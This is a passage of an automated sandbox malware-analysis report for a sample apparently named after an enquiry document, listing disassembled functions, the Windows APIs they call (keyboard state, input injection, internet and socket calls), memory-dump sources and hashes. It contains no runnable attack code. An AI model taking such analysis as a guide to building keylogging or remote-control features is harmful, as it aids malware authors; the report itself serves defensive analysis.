                                • Opcode Fuzzy Hash: b408fba0722dc163a040b26cc6e59f1b84fbee02c5c8f68f66d46f7fb512847c
                                • Instruction Fuzzy Hash: E4A14A756047019FD710DF18C891B6EB7E4BF88360F048559FAAAAB3A1CB70ED44DB82
                                Function 00C6C320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON
                                Download Yara Rule
                                APIs
                                • _memmove.LIBCMT ref: 00C6C419
                                • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00CA6653,?,?,00000000), ref: 00C6C495
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: FileRead_memmove
                                • String ID:
                                • API String ID: 1325644223-0
                                • Opcode ID: 2ee75af0688d06866a9d4b721ad385320e8e4534de1262dc5a085da82f6f9bf9
                                • Instruction ID: bd4bec8dde66b1b03c221bd391289f6a8053504f620f1ff3b6f5cb4d51b78467
                                • Opcode Fuzzy Hash: 2ee75af0688d06866a9d4b721ad385320e8e4534de1262dc5a085da82f6f9bf9
                                • Instruction Fuzzy Hash: A3A1BB70A04605EBDB24CF66C8C4BB9BBB0FF05300F14C1A6E9A5DA391DB35D961DBA1
                                Function 00C842EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                • String ID:
                                • API String ID: 3877424927-0
                                • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                • Instruction ID: 43761e0543d420fb0f29cf1bc31bfd9b2b62ea0b531497d62760fee4137669a1
                                • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                • Instruction Fuzzy Hash: 9151A970A00307DBDB2CAF69888066E77A5AF8132CF24872DF875962E1D7709E519B48
                                Function 00CACC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C641A7: _fseek.LIBCMT ref: 00C641BF
                                  • Part of subcall function 00CACE59: _wcscmp.LIBCMT ref: 00CACF49
                                  • Part of subcall function 00CACE59: _wcscmp.LIBCMT ref: 00CACF5C
                                • _free.LIBCMT ref: 00CACDC9
                                • _free.LIBCMT ref: 00CACDD0
                                • _free.LIBCMT ref: 00CACE3B
                                  • Part of subcall function 00C828CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00C88715,00000000,00C888A3,00C84673,?), ref: 00C828DE
                                  • Part of subcall function 00C828CA: GetLastError.KERNEL32(00000000,?,00C88715,00000000,00C888A3,00C84673,?), ref: 00C828F0
                                • _free.LIBCMT ref: 00CACE43
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                • String ID:
                                • API String ID: 1552873950-0
                                • Opcode ID: 18731f0f7f4a7ef00792dbba070ca72f9465af7f58c3a0cb982353a69a0339a5
                                • Instruction ID: dfcd21b86d5d4ecd5252b19eaa1dc880d88b86adc4f61a1c7376c68bcef9bd26
                                • Opcode Fuzzy Hash: 18731f0f7f4a7ef00792dbba070ca72f9465af7f58c3a0cb982353a69a0339a5
                                • Instruction Fuzzy Hash: 27516DB1D04219AFDF249F64CC81AAEBBB9FF09304F1000AEF219A3281D7715E809F19
                                Function 00CCC2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowRect.USER32(00DF55A0,?), ref: 00CCC354
                                • ScreenToClient.USER32(?,00000002), ref: 00CCC384
                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00CCC3EA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$ClientMoveRectScreen
                                • String ID:
                                • API String ID: 3880355969-0
                                • Opcode ID: 0eb93e5c9e7d116283ba81e5dca4a138e0b6bb46a3227245d6b1cab9e98a8594
                                • Instruction ID: 94262dd6d16fd28cf11868e9049b33d4c552ca9499535394f99ca2d673ef5eef
                                • Opcode Fuzzy Hash: 0eb93e5c9e7d116283ba81e5dca4a138e0b6bb46a3227245d6b1cab9e98a8594
                                • Instruction Fuzzy Hash: 7A515A35900245AFCF24DF68D8C0FAE7BA6AB55320F248559F8299B290D730AE41CB90
                                Function 00C9D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C9D258
                                • __itow.LIBCMT ref: 00C9D292
                                  • Part of subcall function 00C9D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C9D549
                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C9D2FB
                                • __itow.LIBCMT ref: 00C9D350
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$__itow
                                • String ID:
                                • API String ID: 3379773720-0
                                • Opcode ID: 4407a7353ea29e137ddedb1f47461b168f62a2e7901878e0001f9aab066accd3
                                • Instruction ID: 90c99bdeac9b3da208b7ccad101cec2793015eca1b89aee6bf9c6325d86e77a5
                                • Opcode Fuzzy Hash: 4407a7353ea29e137ddedb1f47461b168f62a2e7901878e0001f9aab066accd3
                                • Instruction Fuzzy Hash: AB41A771A00609AFDF25DF54C886BEE7BB9AF48700F000025FA16B7191DB759F45DB51
                                Function 00CAEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CAEF32
                                • GetLastError.KERNEL32(?,00000000), ref: 00CAEF58
                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CAEF7D
                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CAEFA9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateHardLink$DeleteErrorFileLast
                                • String ID:
                                • API String ID: 3321077145-0
                                • Opcode ID: 0c764bb67d860b3065782999c354aaab419fd4a64cafe21e44203be1d21306a6
                                • Instruction ID: 6e74844b643df37c6e7daad4bf9d6595c0d97d1442aaa51ed466c3fcc8009d3f
                                • Opcode Fuzzy Hash: 0c764bb67d860b3065782999c354aaab419fd4a64cafe21e44203be1d21306a6
                                • Instruction Fuzzy Hash: 16416D35600611DFCB20EF19C994A5DBBE5EF89324B19C088E94AAF362CB34FD04DB91
                                Function 00CCB354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                Download Yara Rule
                                APIs
                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CCB3E1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InvalidateRect
                                • String ID:
                                • API String ID: 634782764-0
                                • Opcode ID: db6f08d2f174a8bc001ca0e338bf6cac5df14d148388a962c14d77e8829f8c78
                                • Instruction ID: dc5c4c0456f7b5385d72db62e78130bb3518a90209a7ef5d76a6d13d77878952
                                • Opcode Fuzzy Hash: db6f08d2f174a8bc001ca0e338bf6cac5df14d148388a962c14d77e8829f8c78
                                • Instruction Fuzzy Hash: C831D234604244FBEF28DF98DDC7FAC3765AB05350F14851AFA62DA2A2CB31DE419B61
                                Function 00CCD5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                Download Yara Rule
                                APIs
                                • ClientToScreen.USER32(?,?), ref: 00CCD617
                                • GetWindowRect.USER32(?,?), ref: 00CCD68D
                                • PtInRect.USER32(?,?,00CCEB2C), ref: 00CCD69D
                                • MessageBeep.USER32(00000000), ref: 00CCD70E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Rect$BeepClientMessageScreenWindow
                                • String ID:
                                • API String ID: 1352109105-0
                                • Opcode ID: 98482b9f119ffd5f464d6d4ab90a065eda42110e4016a1d994bbee77dfd16b27
                                • Instruction ID: 7cacde992901ad564bbd75cef47d9f2093d66b80ace116512d989dd669cb1528
                                • Opcode Fuzzy Hash: 98482b9f119ffd5f464d6d4ab90a065eda42110e4016a1d994bbee77dfd16b27
                                • Instruction Fuzzy Hash: 89415634A00219EFCB21DF59D885FA9BBF5BB59300F1885BAE41ADB251D730E942DB90
                                Function 00CA4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 00CA44EE
                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CA450A
                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00CA456A
                                • SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 00CA45C8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: KeyboardState$InputMessagePostSend
                                • String ID:
                                • API String ID: 432972143-0
                                • Opcode ID: 8e5e677d8023b6728ad9acf20834d143291380a59627e21e42364427120854cf
                                • Instruction ID: fd42e766dc4cdb2cf6f57af0b2b3735bdd71a61f4443f412ad3cedc9bfb98f61
                                • Opcode Fuzzy Hash: 8e5e677d8023b6728ad9acf20834d143291380a59627e21e42364427120854cf
                                • Instruction Fuzzy Hash: 223107B1D0029A5FEF388B6598187FE7BA59BC7318F04055AF092961C1C7B49B44DB61
                                Function 00C94DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C94DE8
                                • __isleadbyte_l.LIBCMT ref: 00C94E16
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00C94E44
                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00C94E7A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                • String ID:
                                • API String ID: 3058430110-0
                                • Opcode ID: eca69f7779ceaf6d2ae8f64576cfc884a7bae1c78aac6e5ff09e8ad7531e1652
                                • Instruction ID: 33a2b9bbf4436624c63e7b9bbbc25424c7f4708cbe2a82365ad5562e2224045c
                                • Opcode Fuzzy Hash: eca69f7779ceaf6d2ae8f64576cfc884a7bae1c78aac6e5ff09e8ad7531e1652
                                • Instruction Fuzzy Hash: 7D31B031600246AFDF299F75C849FBABBA5FF41310F154528E8218B1A0E730D952DB90
                                Function 00CC7AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                Download Yara Rule
                                APIs
                                • GetForegroundWindow.USER32 ref: 00CC7AB6
                                  • Part of subcall function 00CA69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CA69E3
                                  • Part of subcall function 00CA69C9: GetCurrentThreadId.KERNEL32 ref: 00CA69EA
                                  • Part of subcall function 00CA69C9: AttachThreadInput.USER32(00000000,?,00CA8127), ref: 00CA69F1
                                • GetCaretPos.USER32(?), ref: 00CC7AC7
                                • ClientToScreen.USER32(00000000,?), ref: 00CC7B00
                                • GetForegroundWindow.USER32 ref: 00CC7B06
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                • String ID:
                                • API String ID: 2759813231-0
                                • Opcode ID: 0db66bd2be7393690b5bd6be261744e4dd27df08bd5c852572a1d212e1dc03cb
                                • Instruction ID: e26f1e89d887ef62168db311f7c891013ea0699e9270cea967997430dc419bd1
                                • Opcode Fuzzy Hash: 0db66bd2be7393690b5bd6be261744e4dd27df08bd5c852572a1d212e1dc03cb
                                • Instruction Fuzzy Hash: 3331FD72D00108AFCB00EFB5DC859EFBBFDEF58314B10806AE856E7211DA359E059BA0
                                Function 00CCEFA8 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • GetCursorPos.USER32(?), ref: 00CCEFE2
                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00CDF3C3,?,?,?,?,?), ref: 00CCEFF7
                                • GetCursorPos.USER32(?), ref: 00CCF041
                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00CDF3C3,?,?,?), ref: 00CCF077
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                • String ID:
                                • API String ID: 2864067406-0
                                • Opcode ID: 2eb723d84a27eeae7b44670e3642770d89bb9d8f828dd80cf64bade36365dedc
                                • Instruction ID: 08255ade713917802f65e25035dbe17ed8e517a17b7597a429f2c7fca599e9b9
                                • Opcode Fuzzy Hash: 2eb723d84a27eeae7b44670e3642770d89bb9d8f828dd80cf64bade36365dedc
                                • Instruction Fuzzy Hash: 3821B135500118FFCB258F94C898FEE7BB6EB49B54F14406DF9158B2A2C3319E52DBA0
                                Function 00CB497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                Download Yara Rule
                                APIs
                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CB49B7
                                  • Part of subcall function 00CB4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CB4A60
                                  • Part of subcall function 00CB4A41: InternetCloseHandle.WININET(00000000), ref: 00CB4AFD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Internet$CloseConnectHandleOpen
                                • String ID:
                                • API String ID: 1463438336-0
                                • Opcode ID: 407c40606a8b2b9692d8b7dc677ec419a72f63f5c7d6411af177151378f80d44
                                • Instruction ID: 0076b9e87d4d031e75a978a733b396a20e86030d381a2bee2adbd5749dd1204f
                                • Opcode Fuzzy Hash: 407c40606a8b2b9692d8b7dc677ec419a72f63f5c7d6411af177151378f80d44
                                • Instruction Fuzzy Hash: 3B21D136248A05BFDB199F608C00FFBBBAEFB48701F14401AFA1696651EB719910BB94
                                Function 00CC8834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowLongW.USER32(?,000000EC), ref: 00CC88A3
                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CC88BD
                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CC88CB
                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CC88D9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Long$AttributesLayered
                                • String ID:
                                • API String ID: 2169480361-0
                                • Opcode ID: 27798a9caed87d26fb34c69f873262d44c0f9995078cc352c90be98554546942
                                • Instruction ID: fd687a5e5a0aca707faba791c8a03abed06989fb3569ad755bde3bea39f2b83d
                                • Opcode Fuzzy Hash: 27798a9caed87d26fb34c69f873262d44c0f9995078cc352c90be98554546942
                                • Instruction Fuzzy Hash: 62118E31205115AFDB14AB28CC85FBB7BA9EF85320F188119F816CB2E1CB70AD04DB90
                                Function 00CB900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                Download Yara Rule
                                APIs
                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00CB906D
                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00CB907F
                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00CB908C
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB90A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorLastacceptselect
                                • String ID:
                                • API String ID: 385091864-0
                                • Opcode ID: ca0fcd798988025defe33fe72de10dca4bacbdd19accc11b4c5c62582bd862f6
                                • Instruction ID: 686b9d0ec2358a4bef5fdb049bb63a46eb3beaef7006c235dea913cf019af915
                                • Opcode Fuzzy Hash: ca0fcd798988025defe33fe72de10dca4bacbdd19accc11b4c5c62582bd862f6
                                • Instruction Fuzzy Hash: 14215172A001249FCB10DF69DC85BDEBBFCEF49710F00816AF94AD7290DA749A41CB90
                                Function 00CA18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00CA2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00CA18FD,?,?,?,00CA26BC,00000000,000000EF,00000119,?,?), ref: 00CA2CB9
                                  • Part of subcall function 00CA2CAA: lstrcpyW.KERNEL32(00000000,?,?,00CA18FD,?,?,?,00CA26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CA2CDF
                                  • Part of subcall function 00CA2CAA: lstrcmpiW.KERNEL32(00000000,?,00CA18FD,?,?,?,00CA26BC,00000000,000000EF,00000119,?,?), ref: 00CA2D10
                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00CA26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CA1916
                                • lstrcpyW.KERNEL32(00000000,?,?,00CA26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CA193C
                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CA26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CA1970
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: lstrcmpilstrcpylstrlen
                                • String ID: cdecl
